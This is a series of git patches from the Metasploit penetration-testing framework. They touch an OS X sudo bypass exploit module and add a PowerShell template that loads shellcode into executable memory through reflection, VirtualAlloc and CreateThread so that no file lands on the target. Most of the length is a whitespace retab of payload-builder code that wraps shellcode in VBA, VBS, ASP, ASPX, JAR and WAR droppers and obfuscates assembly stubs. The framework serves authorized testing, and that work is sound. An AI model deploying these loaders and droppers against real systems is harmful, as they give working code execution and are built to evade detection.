From c7f05c06b3ab1e448488d7b8d56f562bea26b134 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Thu, 29 Aug 2013 12:57:45 -0500 Subject: [PATCH 01/13] Add the require boilerplate Fixes a bug that sometimes comes up with load order on this module. I know @jlee-r7 is working on a better overall solution but this should solve for the short term. Note, since the problem is practically machine-specific. @jlee-r7 suggested rm'ing all modules but the one under test. Doing that exposes the bug, and I've verified this fix in that way. --- modules/exploits/osx/local/sudo_password_bypass.rb | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/modules/exploits/osx/local/sudo_password_bypass.rb b/modules/exploits/osx/local/sudo_password_bypass.rb index ccea3a84f1..efc0420ab4 100644 --- a/modules/exploits/osx/local/sudo_password_bypass.rb +++ b/modules/exploits/osx/local/sudo_password_bypass.rb @@ -5,6 +5,11 @@ # # http://metasploit.com/ ## +require 'msf/core' +require 'rex' +require 'msf/core/post/common' +require 'msf/core/post/file' +require 'msf/core/exploit/exe' require 'shellwords' class Metasploit3 < Msf::Exploit::Local From 345bc7da03f6e121da0679b8c34c51d6849baf08 Mon Sep 17 00:00:00 2001 From: shellster Date: Thu, 29 Aug 2013 18:41:42 -0700 Subject: [PATCH 02/13] New Reflection Powershell Payload Adds Powershell payload which, unlike existing payloads does not drop any temporary files onto the target's computer. All needed methods are dynamically loaded via reflection. --- lib/msf/util/exe.rb | 27 +++++++++++++++++++++++++-- 1 file changed, 25 insertions(+), 2 deletions(-) diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index 9d2555b80d..c7c8edb82f 100755 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -865,7 +865,7 @@ require 'digest/sha1' return read_replace_script_template("to_exe.vba.template", hash_sub) end -def self.to_vba(framework,code,opts={}) + def self.to_vba(framework,code,opts={}) hash_sub = {} hash_sub[:var_myByte] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize hash_sub[:var_myArray] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize @@ -987,6 +987,26 @@ def self.to_vba(framework,code,opts={}) return read_replace_script_template("to_mem_old.ps1.template", hash_sub).gsub(/(? Date: Thu, 29 Aug 2013 18:43:58 -0700 Subject: [PATCH 03/13] Added Template New template for previous commit. --- .../scripts/to_mem_pshreflection.ps1.template | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 data/templates/scripts/to_mem_pshreflection.ps1.template diff --git a/data/templates/scripts/to_mem_pshreflection.ps1.template b/data/templates/scripts/to_mem_pshreflection.ps1.template new file mode 100644 index 0000000000..c56e66cabe --- /dev/null +++ b/data/templates/scripts/to_mem_pshreflection.ps1.template @@ -0,0 +1,33 @@ +#Added a tweaked by shellster +#Originally taken from https://github.com/mattifestation/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1 + +function %{func_get_proc_address} { + Param ($%{var_module}, $%{var_procedure}) + $%{var_unsafe_native_methods} = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') + + return $%{var_unsafe_native_methods}.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($%{var_unsafe_native_methods}.GetMethod('GetModuleHandle')).Invoke($null, @($%{var_module})))), $%{var_procedure})) +} + +function %{func_get_delegate_type} { + Param ( + [Parameter(Position = 0, Mandatory = $True)] [Type[]] $%{var_parameters}, + [Parameter(Position = 1)] [Type] $%{var_return_type} = [Void] + ) + + $%{var_type_builder} = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) + $%{var_type_builder}.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $%{var_parameters}).SetImplementationFlags('Runtime, Managed') + $%{var_type_builder}.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $%{var_return_type}, $%{var_parameters}).SetImplementationFlags('Runtime, Managed') + + return $%{var_type_builder}.CreateType() +} + +%{shellcode} + +$%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, 0x1000, [math]::max(0x1000, $%{var_code}.Length), 0x40) +$%{var_memset} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} msvcrt.dll memset), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32]))) + +for ($i=0;$i -le ($%{var_code}.Length-1);$i++) { + $%{var_memset}.Invoke([IntPtr]($%{var_buffer}.ToInt32()+$i), $%{var_code}[$i], 1) | Out-Null +} + +[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero) | Out-Null From 7e00e2aabad60a334e29c97c1d561d80595ea383 Mon Sep 17 00:00:00 2001 From: Tab Assassin Date: Thu, 5 Sep 2013 13:37:58 -0500 Subject: [PATCH 04/13] Retab changes for PR #2307 --- lib/msf/util/exe.rb | 732 ++++++++++++++++++++++---------------------- 1 file changed, 366 insertions(+), 366 deletions(-) diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index 011bbe3a34..50174272bc 100755 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -865,208 +865,208 @@ require 'digest/sha1' return read_replace_script_template("to_exe.vba.template", hash_sub) end - def self.to_vba(framework,code,opts={}) - hash_sub = {} - hash_sub[:var_myByte] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize - hash_sub[:var_myArray] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize - hash_sub[:var_rwxpage] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize - hash_sub[:var_res] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize - hash_sub[:var_offset] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize - hash_sub[:var_lpThreadAttributes] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize - hash_sub[:var_dwStackSize] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize - hash_sub[:var_lpStartAddress] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize - hash_sub[:var_lpParameter] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize - hash_sub[:var_dwCreationFlags] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize - hash_sub[:var_lpThreadID] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize - hash_sub[:var_lpAddr] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize - hash_sub[:var_lSize] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize - hash_sub[:var_flAllocationType] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize - hash_sub[:var_flProtect] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize - hash_sub[:var_lDest] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize - hash_sub[:var_Source] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize - hash_sub[:var_Length] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize + def self.to_vba(framework,code,opts={}) + hash_sub = {} + hash_sub[:var_myByte] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize + hash_sub[:var_myArray] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize + hash_sub[:var_rwxpage] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize + hash_sub[:var_res] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize + hash_sub[:var_offset] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize + hash_sub[:var_lpThreadAttributes] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize + hash_sub[:var_dwStackSize] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize + hash_sub[:var_lpStartAddress] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize + hash_sub[:var_lpParameter] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize + hash_sub[:var_dwCreationFlags] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize + hash_sub[:var_lpThreadID] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize + hash_sub[:var_lpAddr] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize + hash_sub[:var_lSize] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize + hash_sub[:var_flAllocationType] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize + hash_sub[:var_flProtect] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize + hash_sub[:var_lDest] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize + hash_sub[:var_Source] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize + hash_sub[:var_Length] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize - # put the shellcode bytes into an array - hash_sub[:bytes] = Rex::Text.to_vbapplication(code, hash_sub[:var_myArray]) + # put the shellcode bytes into an array + hash_sub[:bytes] = Rex::Text.to_vbapplication(code, hash_sub[:var_myArray]) - return read_replace_script_template("to_mem.vba.template", hash_sub) - end + return read_replace_script_template("to_mem.vba.template", hash_sub) + end - def self.to_exe_vbs(exes = '', opts={}) - delay = opts[:delay] || 5 - persist = opts[:persist] || false + def self.to_exe_vbs(exes = '', opts={}) + delay = opts[:delay] || 5 + persist = opts[:persist] || false - hash_sub = {} - hash_sub[:var_shellcode] = "" - hash_sub[:var_bytes] = Rex::Text.rand_text_alpha(rand(4)+4) # repeated a large number of times, so keep this one small - hash_sub[:var_fname] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_func] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_stream] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_obj] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_shell] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_tempdir] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_tempexe] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_basedir] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub = {} + hash_sub[:var_shellcode] = "" + hash_sub[:var_bytes] = Rex::Text.rand_text_alpha(rand(4)+4) # repeated a large number of times, so keep this one small + hash_sub[:var_fname] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_func] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_stream] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_obj] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_shell] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_tempdir] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_tempexe] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_basedir] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_shellcode] = Rex::Text.to_vbscript(exes, hash_sub[:var_bytes]) + hash_sub[:var_shellcode] = Rex::Text.to_vbscript(exes, hash_sub[:var_bytes]) - hash_sub[:init] = "" + hash_sub[:init] = "" - if(persist) - hash_sub[:init] << "Do\r\n" - hash_sub[:init] << "#{hash_sub[:var_func]}\r\n" - hash_sub[:init] << "WScript.Sleep #{delay * 1000}\r\n" - hash_sub[:init] << "Loop\r\n" - else - hash_sub[:init] << "#{hash_sub[:var_func]}\r\n" - end + if(persist) + hash_sub[:init] << "Do\r\n" + hash_sub[:init] << "#{hash_sub[:var_func]}\r\n" + hash_sub[:init] << "WScript.Sleep #{delay * 1000}\r\n" + hash_sub[:init] << "Loop\r\n" + else + hash_sub[:init] << "#{hash_sub[:var_func]}\r\n" + end - return read_replace_script_template("to_exe.vbs.template", hash_sub) - end + return read_replace_script_template("to_exe.vbs.template", hash_sub) + end - def self.to_exe_asp(exes = '', opts={}) - hash_sub = {} - hash_sub[:var_bytes] = Rex::Text.rand_text_alpha(rand(4)+4) # repeated a large number of times, so keep this one small - hash_sub[:var_fname] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_func] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_stream] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_obj] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_shell] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_tempdir] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_tempexe] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_basedir] = Rex::Text.rand_text_alpha(rand(8)+8) + def self.to_exe_asp(exes = '', opts={}) + hash_sub = {} + hash_sub[:var_bytes] = Rex::Text.rand_text_alpha(rand(4)+4) # repeated a large number of times, so keep this one small + hash_sub[:var_fname] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_func] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_stream] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_obj] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_shell] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_tempdir] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_tempexe] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_basedir] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_shellcode] = Rex::Text.to_vbscript(exes, hash_sub[:var_bytes]) + hash_sub[:var_shellcode] = Rex::Text.to_vbscript(exes, hash_sub[:var_bytes]) - return read_replace_script_template("to_exe.asp.template", hash_sub) - end + return read_replace_script_template("to_exe.asp.template", hash_sub) + end - def self.to_exe_aspx(exes = '', opts={}) - hash_sub = {} - hash_sub[:var_file] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_tempdir] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_basedir] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_filename] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_tempexe] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_iterator] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_proc] = Rex::Text.rand_text_alpha(rand(8)+8) + def self.to_exe_aspx(exes = '', opts={}) + hash_sub = {} + hash_sub[:var_file] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_tempdir] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_basedir] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_filename] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_tempexe] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_iterator] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_proc] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:shellcode] = Rex::Text.to_csharp(exes,100,hash_sub[:var_file]) + hash_sub[:shellcode] = Rex::Text.to_csharp(exes,100,hash_sub[:var_file]) - return read_replace_script_template("to_exe.aspx.template", hash_sub) - end + return read_replace_script_template("to_exe.aspx.template", hash_sub) + end - def self.to_win32pe_psh_net(framework, code, opts={}) - hash_sub = {} - hash_sub[:var_code] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_kernel32] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_baseaddr] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_threadHandle] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_output] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_temp] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_codeProvider] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_compileParams] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:var_syscode] = Rex::Text.rand_text_alpha(rand(8)+8) + def self.to_win32pe_psh_net(framework, code, opts={}) + hash_sub = {} + hash_sub[:var_code] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_kernel32] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_baseaddr] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_threadHandle] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_output] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_temp] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_codeProvider] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_compileParams] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:var_syscode] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:shellcode] = Rex::Text.to_powershell(code, hash_sub[:var_code]) + hash_sub[:shellcode] = Rex::Text.to_powershell(code, hash_sub[:var_code]) - return read_replace_script_template("to_mem_dotnet.ps1.template", hash_sub).gsub(/(? "metasploit.Payload" - config = "Spawn=#{spawn}\r\nExecutable=#{exe_name}\r\n" - zip.add_file("metasploit.dat", config) - zip.add_file(exe_name, exe) + # Creates a jar file that drops the provided +exe+ into a random file name + # in the system's temp dir and executes it. + # + # @see Msf::Payload::Java + # + # @return [Rex::Zip::Jar] + def self.to_jar(exe, opts={}) + spawn = opts[:spawn] || 2 + exe_name = Rex::Text.rand_text_alpha(8) + ".exe" + zip = Rex::Zip::Jar.new + paths = [ + [ "metasploit", "Payload.class" ], + ] + zip.add_files(paths, File.join(Msf::Config.data_directory, "java")) + zip.build_manifest :main_class => "metasploit.Payload" + config = "Spawn=#{spawn}\r\nExecutable=#{exe_name}\r\n" + zip.add_file("metasploit.dat", config) + zip.add_file(exe_name, exe) - zip - end + zip + end - # Creates a Web Archive (WAR) file from the provided jsp code. - # - # On Tomcat, WAR files will be deployed into a directory with the same name - # as the archive, e.g. +foo.war+ will be extracted into +foo/+. If the - # server is in a default configuration, deoployment will happen - # automatically. See - # {http://tomcat.apache.org/tomcat-5.5-doc/config/host.html the Tomcat - # documentation} for a description of how this works. - # - # @param jsp_raw [String] JSP code to be added in a file called +jsp_name+ - # in the archive. This will be compiled by the victim servlet container - # (e.g., Tomcat) and act as the main function for the servlet. - # @param opts [Hash] - # @option opts :jsp_name [String] Name of the in the archive - # _without the .jsp extension_. Defaults to random. - # @option opts :app_name [String] Name of the app to put in the - # tag. Mostly irrelevant, except as an identifier in web.xml. Defaults to - # random. - # @option opts :extra_files [Array] Additional files to add - # to the archive. First elment is filename, second is data - # - # @todo Refactor to return a {Rex::Zip::Archive} or {Rex::Zip::Jar} - # - # @return [String] - def self.to_war(jsp_raw, opts={}) - jsp_name = opts[:jsp_name] - jsp_name ||= Rex::Text.rand_text_alpha_lower(rand(8)+8) - app_name = opts[:app_name] - app_name ||= Rex::Text.rand_text_alpha_lower(rand(8)+8) + # Creates a Web Archive (WAR) file from the provided jsp code. + # + # On Tomcat, WAR files will be deployed into a directory with the same name + # as the archive, e.g. +foo.war+ will be extracted into +foo/+. If the + # server is in a default configuration, deoployment will happen + # automatically. See + # {http://tomcat.apache.org/tomcat-5.5-doc/config/host.html the Tomcat + # documentation} for a description of how this works. + # + # @param jsp_raw [String] JSP code to be added in a file called +jsp_name+ + # in the archive. This will be compiled by the victim servlet container + # (e.g., Tomcat) and act as the main function for the servlet. + # @param opts [Hash] + # @option opts :jsp_name [String] Name of the in the archive + # _without the .jsp extension_. Defaults to random. + # @option opts :app_name [String] Name of the app to put in the + # tag. Mostly irrelevant, except as an identifier in web.xml. Defaults to + # random. + # @option opts :extra_files [Array] Additional files to add + # to the archive. First elment is filename, second is data + # + # @todo Refactor to return a {Rex::Zip::Archive} or {Rex::Zip::Jar} + # + # @return [String] + def self.to_war(jsp_raw, opts={}) + jsp_name = opts[:jsp_name] + jsp_name ||= Rex::Text.rand_text_alpha_lower(rand(8)+8) + app_name = opts[:app_name] + app_name ||= Rex::Text.rand_text_alpha_lower(rand(8)+8) - meta_inf = [ 0xcafe, 0x0003 ].pack('Vv') - manifest = "Manifest-Version: 1.0\r\nCreated-By: 1.6.0_17 (Sun Microsystems Inc.)\r\n\r\n" - web_xml = %q{ + meta_inf = [ 0xcafe, 0x0003 ].pack('Vv') + manifest = "Manifest-Version: 1.0\r\nCreated-By: 1.6.0_17 (Sun Microsystems Inc.)\r\n\r\n" + web_xml = %q{ @@ -1586,232 +1586,232 @@ require 'digest/sha1' pop eax ; Skip popad ; Get our registers back ; sub esp, 44 ; Move stack pointer back past the handler - ^ + ^ - stub_final = %Q^ - get_payload: - call got_payload - payload: - ; Append an arbitrary payload here - ^ + stub_final = %Q^ + get_payload: + call got_payload + payload: + ; Append an arbitrary payload here + ^ - stub_alloc.gsub!('short', '') - stub_alloc.gsub!('byte', '') + stub_alloc.gsub!('short', '') + stub_alloc.gsub!('byte', '') - wrapper = "" - # regs = %W{eax ebx ecx edx esi edi ebp} + wrapper = "" + # regs = %W{eax ebx ecx edx esi edi ebp} - cnt_jmp = 0 - cnt_nop = 64 + cnt_jmp = 0 + cnt_nop = 64 - stub_alloc.each_line do |line| - line.gsub!(/;.*/, '') - line.strip! - next if line.empty? + stub_alloc.each_line do |line| + line.gsub!(/;.*/, '') + line.strip! + next if line.empty? - if (cnt_nop > 0 and rand(4) == 0) - wrapper << "nop\n" - cnt_nop -= 1 - end + if (cnt_nop > 0 and rand(4) == 0) + wrapper << "nop\n" + cnt_nop -= 1 + end - if(cnt_nop > 0 and rand(16) == 0) - cnt_nop -= 2 - cnt_jmp += 1 + if(cnt_nop > 0 and rand(16) == 0) + cnt_nop -= 2 + cnt_jmp += 1 - wrapper << "jmp autojump#{cnt_jmp}\n" - 1.upto(rand(8)+1) do - wrapper << "db 0x#{"%.2x" % rand(0x100)}\n" - cnt_nop -= 1 - end - wrapper << "autojump#{cnt_jmp}:\n" - end - wrapper << line + "\n" - end + wrapper << "jmp autojump#{cnt_jmp}\n" + 1.upto(rand(8)+1) do + wrapper << "db 0x#{"%.2x" % rand(0x100)}\n" + cnt_nop -= 1 + end + wrapper << "autojump#{cnt_jmp}:\n" + end + wrapper << line + "\n" + end - #someone who knows how to use metasm please explain the right way to do this. - wrapper << "db 0xe9\n db 0xFF\n db 0xFF\n db 0xFF\n db 0xFF\n" - wrapper << stub_final + #someone who knows how to use metasm please explain the right way to do this. + wrapper << "db 0xe9\n db 0xFF\n db 0xFF\n db 0xFF\n db 0xFF\n" + wrapper << stub_final - enc = Metasm::Shellcode.assemble(Metasm::Ia32.new, wrapper).encoded - soff = enc.data.index("\xe9\xff\xff\xff\xff") + 1 - res = enc.data + code + enc = Metasm::Shellcode.assemble(Metasm::Ia32.new, wrapper).encoded + soff = enc.data.index("\xe9\xff\xff\xff\xff") + 1 + res = enc.data + code - if which_offset == 'start' - res[soff,4] = [block_offset - (soff + 4)].pack('V') - elsif which_offset == 'end' - res[soff,4] = [res.length - (soff + 4) + block_offset].pack('V') - else - raise RuntimeError, 'Blast! Msf::Util::EXE.rwx_exec_thread called with invalid offset!' - end - res - end + if which_offset == 'start' + res[soff,4] = [block_offset - (soff + 4)].pack('V') + elsif which_offset == 'end' + res[soff,4] = [res.length - (soff + 4) + block_offset].pack('V') + else + raise RuntimeError, 'Blast! Msf::Util::EXE.rwx_exec_thread called with invalid offset!' + end + res + end - # - # Generate an executable of a given format suitable for running on the - # architecture/platform pair. - # - # This routine is shared between msfencode, rpc, and payload modules (use - # ) - # - # @param framework [Framework] - # @param arch [String] Architecture for the target format; one of the ARCH_* - # constants - # @param plat [#index] platform - # @param code [String] The shellcode for the resulting executable to run - # @param fmt [String] One of the executable formats as defined in - # {.to_executable_fmt_formats} - # @param exeopts [Hash] Passed directly to the approrpriate method for - # generating an executable for the given +arch+/+plat+ pair. - # @return [String] An executable appropriate for the given - # architecture/platform pair. - # @return [nil] If the format is unrecognized or the arch and plat don't - # make sense together. - def self.to_executable_fmt(framework, arch, plat, code, fmt, exeopts) - # For backwards compatibility with the way this gets called when - # generating from Msf::Simple::Payload.generate_simple - if arch.kind_of? Array - output = nil - arch.each do |a| - output = to_executable_fmt(framework, a, plat, code, fmt, exeopts) - break if output - end - return output - end + # + # Generate an executable of a given format suitable for running on the + # architecture/platform pair. + # + # This routine is shared between msfencode, rpc, and payload modules (use + # ) + # + # @param framework [Framework] + # @param arch [String] Architecture for the target format; one of the ARCH_* + # constants + # @param plat [#index] platform + # @param code [String] The shellcode for the resulting executable to run + # @param fmt [String] One of the executable formats as defined in + # {.to_executable_fmt_formats} + # @param exeopts [Hash] Passed directly to the approrpriate method for + # generating an executable for the given +arch+/+plat+ pair. + # @return [String] An executable appropriate for the given + # architecture/platform pair. + # @return [nil] If the format is unrecognized or the arch and plat don't + # make sense together. + def self.to_executable_fmt(framework, arch, plat, code, fmt, exeopts) + # For backwards compatibility with the way this gets called when + # generating from Msf::Simple::Payload.generate_simple + if arch.kind_of? Array + output = nil + arch.each do |a| + output = to_executable_fmt(framework, a, plat, code, fmt, exeopts) + break if output + end + return output + end - case fmt - when 'asp' - exe = to_executable_fmt(framework, arch, plat, code, 'exe', exeopts) - output = Msf::Util::EXE.to_exe_asp(exe, exeopts) + case fmt + when 'asp' + exe = to_executable_fmt(framework, arch, plat, code, 'exe', exeopts) + output = Msf::Util::EXE.to_exe_asp(exe, exeopts) - when 'aspx' - exe = to_executable_fmt(framework, arch, plat, code, 'exe', exeopts) - output = Msf::Util::EXE.to_exe_aspx(exe, exeopts) + when 'aspx' + exe = to_executable_fmt(framework, arch, plat, code, 'exe', exeopts) + output = Msf::Util::EXE.to_exe_aspx(exe, exeopts) - when 'dll' - output = case arch - when ARCH_X86,nil then to_win32pe_dll(framework, code, exeopts) - when ARCH_X86_64 then to_win64pe_dll(framework, code, exeopts) - when ARCH_X64 then to_win64pe_dll(framework, code, exeopts) - end - when 'exe' - output = case arch - when ARCH_X86,nil then to_win32pe(framework, code, exeopts) - when ARCH_X86_64 then to_win64pe(framework, code, exeopts) - when ARCH_X64 then to_win64pe(framework, code, exeopts) - end + when 'dll' + output = case arch + when ARCH_X86,nil then to_win32pe_dll(framework, code, exeopts) + when ARCH_X86_64 then to_win64pe_dll(framework, code, exeopts) + when ARCH_X64 then to_win64pe_dll(framework, code, exeopts) + end + when 'exe' + output = case arch + when ARCH_X86,nil then to_win32pe(framework, code, exeopts) + when ARCH_X86_64 then to_win64pe(framework, code, exeopts) + when ARCH_X64 then to_win64pe(framework, code, exeopts) + end - when 'exe-service' - output = case arch - when ARCH_X86,nil then to_win32pe_service(framework, code, exeopts) - when ARCH_X86_64 then to_win64pe_service(framework, code, exeopts) - when ARCH_X64 then to_win64pe_service(framework, code, exeopts) - end + when 'exe-service' + output = case arch + when ARCH_X86,nil then to_win32pe_service(framework, code, exeopts) + when ARCH_X86_64 then to_win64pe_service(framework, code, exeopts) + when ARCH_X64 then to_win64pe_service(framework, code, exeopts) + end - when 'exe-small' - output = case arch - when ARCH_X86,nil then to_win32pe_old(framework, code, exeopts) - end + when 'exe-small' + output = case arch + when ARCH_X86,nil then to_win32pe_old(framework, code, exeopts) + end - when 'exe-only' - output = case arch - when ARCH_X86,nil then to_winpe_only(framework, code, exeopts, arch) - when ARCH_X86_64 then to_winpe_only(framework, code, exeopts, arch) - when ARCH_X64 then to_winpe_only(framework, code, exeopts, arch) - end + when 'exe-only' + output = case arch + when ARCH_X86,nil then to_winpe_only(framework, code, exeopts, arch) + when ARCH_X86_64 then to_winpe_only(framework, code, exeopts, arch) + when ARCH_X64 then to_winpe_only(framework, code, exeopts, arch) + end - when 'elf' - if (not plat or (plat.index(Msf::Module::Platform::Linux))) - output = case arch - when ARCH_X86,nil then to_linux_x86_elf(framework, code, exeopts) - when ARCH_X86_64 then to_linux_x64_elf(framework, code, exeopts) - when ARCH_X64 then to_linux_x64_elf(framework, code, exeopts) - when ARCH_ARMLE then to_linux_armle_elf(framework, code, exeopts) - when ARCH_MIPSBE then to_linux_mipsbe_elf(framework, code, exeopts) - when ARCH_MIPSLE then to_linux_mipsle_elf(framework, code, exeopts) - end - elsif(plat and (plat.index(Msf::Module::Platform::BSD))) - output = case arch - when ARCH_X86,nil then Msf::Util::EXE.to_bsd_x86_elf(framework, code, exeopts) - end - elsif(plat and (plat.index(Msf::Module::Platform::Solaris))) - output = case arch - when ARCH_X86,nil then to_solaris_x86_elf(framework, code, exeopts) - end - end + when 'elf' + if (not plat or (plat.index(Msf::Module::Platform::Linux))) + output = case arch + when ARCH_X86,nil then to_linux_x86_elf(framework, code, exeopts) + when ARCH_X86_64 then to_linux_x64_elf(framework, code, exeopts) + when ARCH_X64 then to_linux_x64_elf(framework, code, exeopts) + when ARCH_ARMLE then to_linux_armle_elf(framework, code, exeopts) + when ARCH_MIPSBE then to_linux_mipsbe_elf(framework, code, exeopts) + when ARCH_MIPSLE then to_linux_mipsle_elf(framework, code, exeopts) + end + elsif(plat and (plat.index(Msf::Module::Platform::BSD))) + output = case arch + when ARCH_X86,nil then Msf::Util::EXE.to_bsd_x86_elf(framework, code, exeopts) + end + elsif(plat and (plat.index(Msf::Module::Platform::Solaris))) + output = case arch + when ARCH_X86,nil then 